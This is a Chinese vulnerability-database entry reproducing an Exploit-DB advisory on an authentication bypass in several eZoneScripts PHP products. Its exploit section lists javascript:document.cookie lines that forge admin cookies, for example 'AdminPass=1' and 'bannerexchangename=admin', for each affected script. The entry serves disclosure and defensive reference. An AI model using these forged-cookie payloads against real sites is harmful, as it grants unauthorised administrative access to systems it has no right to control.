eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057433 漏洞类型
发布时间 2009-02-09 更新时间 2009-02-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/33934
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/39912/info

eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks. 

The following example cookie data is available:

Banner Exchange Website and Adult Banner Exchange Website:

javascript:document.cookie="bannerexchangename=admin; path=/";
javascript:document.cookie="bannerexchangerand=905; path=/";


Classified Ultra Script:

javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";


Apartment Search Script:

javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";


phpMiniSite Script:

javascript:document.cookie="auth=fook; path=/";